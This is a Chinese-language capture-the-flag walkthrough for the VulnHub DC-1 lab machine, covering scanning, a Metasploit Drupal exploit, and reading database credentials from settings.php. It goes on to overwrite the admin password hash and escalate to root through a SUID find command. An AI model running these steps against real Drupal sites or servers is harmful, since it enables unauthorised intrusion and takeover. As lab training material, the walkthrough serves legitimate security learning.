DC-1 通关解析
一:搭建环境
在虚拟机安装好dc-1。下载地址
https://download.vulnhub.com/dc/DC-1.zip
安装dc-1,进入虚拟机并点击打开虚拟机选择如下图文件。
名称,路径填写完导入完成后(如果报错,点击重试)开启虚拟机,需和kali在同一个局域网下,设置成NAT。如下图页面。
二:开启kali进入管理员权限。先查看自己kali的IP地址
Ifconfig
三:收集信息,寻找靶场ip
nmap -sP 192.168.***.***/24(自己kali IP地址)-sP:不扫描端口,只扫描存活主机。如下图。
如果不知道哪个是靶场的IP地址可以一个一个试。
步骤四:收集信息,查看端口和服务
nmap -A -p- -v 192.168.45.130(自己靶场ip)
-A 综合性扫描
-v 冗余模式,扫描详细信息
1.开放端口22.80.111.且80端口存在wbe服务
访问web
2.需要利用MSF进行渗透
先进入MSF控制台
Msfconsole
搜索drupal(search:搜索相应模块)模块
search drupal
用use 1测试(use:对应模块)。给靶场设置IP set rhosts 靶场ip运行MSF,输入run(run:攻击)
输入shell。执行whoami
出现www-data权限。进入home目录,再进入flag4,发现flag4.txt文件,需补ls(ls:列表,列出)提示需要提升权限
3.使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
显示了当前路径
查看www目录下文件
cd /var/www
发现flag1文件,查看flag1.txt提示文件配置
4.Drupal的默认配置文件为
/var/www/sites/default/settings.php
查看文件内容
cat /var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
进入数据库
mysql -u dbuser -p
Username:dbuser
password:R0ck3t
查看数据库
Show databases;
切换数据库drupaldb
Use drupaldb
5.查看查找默认的Drupal user 表
select * from users;
可以看到admin等信息
可以通过置换drupal密码来解决,重新进入www目录使用命令:quit;退出当前阶段即可。
在站点路径下执行
php scripts/password-hash.sh 新密码
进入数据库把密码字段替换,进入MySQL输入密码切换数据库drupaldb
mysql -u dbuser -pR0ck3t
use drupaldb
将pass文段替换
update users set
Pass=”$S$D.zdRZFb5yJjtusEtSn5993UEw9RKGqvd3zk9KTZSFEwGwhEQc.r” where name=”admin”;
回到刚web页面进行登录
Username:admin
Password:123(上步自己设置的)
登陆成功
能点的点点
发现flag3,点进去
大致意思需要提权我们可通过SUID进行提权
查看suid权限(先用quit;回到上一个)
find / -perm -4000 2>/dev/null
发现find命令
使用命令测试
touch 123
Ls
find / -name 123 -exec "whoami" \;
Root权限
- 执行find ./ -name 123 -exec "/bin/sh" \;
再执行whoami(查看当前权限),执行ls,切换到root目录,查看文件,
发现最后文件thefinalflag.txt
查看该文件cat thefinalflag.txt
你通关了。恭喜